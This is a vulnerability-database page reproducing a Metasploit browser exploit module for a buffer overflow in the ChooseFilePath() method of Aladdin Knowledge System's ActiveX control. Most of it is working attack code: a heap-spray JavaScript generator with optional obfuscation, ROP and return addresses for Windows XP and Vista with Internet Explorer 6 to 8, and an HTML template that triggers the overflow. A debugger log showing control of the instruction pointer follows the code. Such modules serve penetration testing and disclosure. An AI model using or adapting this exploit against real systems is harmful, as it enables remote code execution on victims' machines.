Lucene search
K

Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow

🗓️ 31 Oct 2012 08:32:43Reported by shinnai, b33f, sinn3r <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflo

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Aladdin Knowledge System's
        ActiveX component.  By supplying a long string of data to the ChooseFilePath()
        function, a buffer overflow occurs, which may result in remote code execution
        under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'shinnai',       #Vulnerability Discovery
          'b33f',          #Original exploit
          'sinn3r',        #Metasploit
          'juan vazquez'   #Metasploit, IE8 target
        ],
      'References'     =>
        [
          [ 'OSVDB', '86723' ],
          [ 'EDB',   '22258' ],
          [ 'EDB',   '22301' ]
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :activex => [
            {
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
              method: "ChooseFilePath"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 6',
              {
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
                'ua_name'   => 'MSIE',
                'ua_ver'    => '6.0',
                'Rop'       => false,
                'Offset' => '0x5F4',
                'Ret' => 0x0c0c0c0c
              }
          ],
          [
            'Windows XP with IE 7',
              {
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
                'ua_name'   => 'MSIE',
                'ua_ver'    => '7.0',
                'Rop'       => false,
                'Offset' => '0x5F4',
                'Ret' => 0x0c0c0c0c
              }
          ],
          [
            'Windows XP with IE 8',
              {
                'os_name'   => OperatingSystems::Match::WINDOWS_XP,
                'ua_name'   => 'MSIE',
                'ua_ver'    => '8.0',
                'Rop'       => true,
                'Offset' => '0x5f6',
                'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
              }
          ],
          [
            'Windows Vista with IE 7',
              {
                'os_name'   => OperatingSystems::Match::WINDOWS_VISTA,
                'ua_name'   => 'MSIE',
                'ua_ver'    => '7.0',
                'Rop'       => false,
                'Offset' => '0x5F4',
                'Ret' => 0x0c0c0c0c
              }
          ]

        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-04-01',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )
  end


  def ie_heap_spray(p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
    randnop = rand_text_alpha(rand(100) + 1)

    # Land the payload at 0x0c0c0c0c

    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var #{randnop} = "#{js_nops}";
    var nops = unescape(#{randnop});
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{get_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    return js
  end

  def exploit_template(cli, target_info)

    if get_target['Rop']
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
    else
      p = get_payload(cli, target_info)
    end

    spray = ie_heap_spray(p)
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))

    html_template = %Q|
    <html>
    <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
    <script>
    <%=spray%>
    junk='';
    for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
    pwnd.ChooseFilePath(junk + "<%=target_ret%>");
    </script>
    </html>
    |

    return html_template, binding()
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Sending HTML...")
    send_exploit_html(cli, exploit_template(cli, target_info))
  end
end

=begin
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
OLEAUT32!SysReAllocStringLen+0x31:
7712a41a 8b00            mov     eax,dword ptr [eax]  ds:0023:0c0c0c0c=????????
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
0c0c0c0c ??              ???
0:008> db 020bf798
020bf798  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7a8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7b8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7c8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7d8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7e8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf7f8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
020bf808  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation